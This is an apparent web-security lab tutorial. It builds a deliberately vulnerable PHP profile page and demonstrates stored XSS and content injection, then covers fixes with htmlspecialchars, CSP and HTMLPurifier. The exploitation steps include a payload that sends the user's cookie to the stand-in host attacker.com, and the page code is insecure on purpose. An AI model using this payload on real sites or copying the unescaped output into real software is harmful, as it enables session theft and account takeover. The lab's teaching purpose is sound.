Objective
Learn how to exploit Content Injection and JavaScript Injection vulnerabilities to modify a web page’s content or execute malicious JavaScript in users’ browsers. Understand how to mitigate these risks using proper input sanitization and Content Security Policies (CSP).
Scenario
You are assessing a web application that allows users to update their profile information. Due to the lack of input sanitization, attackers can inject malicious content, such as JavaScript, into the profile page, leading to data theft or account compromise.
Lab Setup
Prerequisites:
- Basic knowledge of PHP, HTML, and JavaScript.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for User Profile Update
Create a file profile.php:
<?php
session_start();
$_SESSION['user'] = 'alice'; // Simulate a logged-in user
if (isset($_POST['update'])) {
$bio = $_POST['bio'];
file_put_contents('bio.txt', $bio);
}
$stored_bio = file_exists('bio.txt') ? file_get_contents('bio.txt') : '';
?>
<h2>User Profile</h2>
<form method="POST" action="">
Bio: <textarea name="bio" rows="5" cols="30"><?php echo $stored_bio; ?></textarea><br>
<button type="submit" name="update">Update Bio</button>
</form>
<h3>Bio Preview:</h3>
<div><?php echo $stored_bio; ?></div>Running the Application
- Start the Apache server.
- Place
profile.phpin the web server’s root directory (htdocsfor XAMPP). - Open
http://localhost/profile.phpin your browser.
Exploitation Steps
Step 1: Injecting Malicious JavaScript
In the Bio field, enter the following payload:
<script>alert('XSS')</script>Submit the form.
Expected Result:
- An alert box pops up when the page reloads, demonstrating JavaScript execution.
Step 2: Data Theft via JavaScript Injection
Replace the payload with:
<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>Expected Result:
The user’s session cookie is sent to the attacker’s server.
Step 3: Modifying Page Content
Enter the following payload:
<h1>Hacked by Attacker</h1>Expected Result:
- The content of the page is visibly altered.
Solution and Prevention
Problem Analysis
- User input is directly rendered without sanitization, allowing malicious code execution.
Fixing the Vulnerability
Sanitize User Input
Use htmlspecialchars() to escape HTML special characters:
$bio = htmlspecialchars($_POST['bio'], ENT_QUOTES, 'UTF-8');
file_put_contents('bio.txt', $bio);Implement Content Security Policy (CSP)
Add CSP headers to block inline scripts:
header("Content-Security-Policy: default-src 'self'; script-src 'self';");Use Trusted Libraries for Input Sanitization
Use libraries like HTMLPurifier for sanitizing rich-text inputs.
Validate and Filter Input on Both Client and Server Side
Implement strict input validation rules.
Testing After Fix
Attempt to inject the previous JavaScript payload:
<script>alert('XSS')</script>Expected Result:
The script does not execute; the input is displayed as plain text.
Attempt to modify page content:
<h1>Hacked by Attacker</h1>Expected Result:
HTML tags are escaped, and no unauthorized content change occurs.
Conclusion
In this lab, you exploited Content Injection and JavaScript Injection vulnerabilities to manipulate web content and execute malicious code. You also learned how to prevent these attacks by sanitizing input, implementing Content Security Policies (CSP), and validating user input properly.
0 Comments